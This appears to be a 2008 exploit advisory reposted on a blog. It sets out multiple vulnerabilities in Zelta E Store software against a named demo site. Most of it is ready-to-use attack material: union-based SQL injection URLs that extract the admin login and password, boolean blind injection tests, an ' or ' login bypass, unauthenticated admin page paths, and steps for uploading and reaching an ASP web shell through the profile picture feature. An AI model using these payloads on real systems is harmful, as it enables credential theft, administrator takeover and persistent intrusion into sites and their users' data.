link: http://www.milw0rm.com/exploits/7494
link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt
Discovered By: ZoRLu
exp for demo: (R-SQL)
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
exp for demo: (B-SQL)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
exp for demo: (auth bypass)
http://joineazy.com/members/login.asp
username: trt-turk@hotmail.com
pass: ' or '
exp for demo: (admin bypass)
http://joineazy.com/embadmin/admin_main.asp
http://joineazy.com/embadmin/site_setup.asp
http://joineazy.com/embadmin/main_baseimage.asp
exp for demo: (RFU)
firs you register to site
login to site and edit your pictures select your shell.asp
go your shell asp:
http://joineazy.com/members/member_pictures/shell.asp
17 Aralık 2008 Çarşamba
Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities
Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder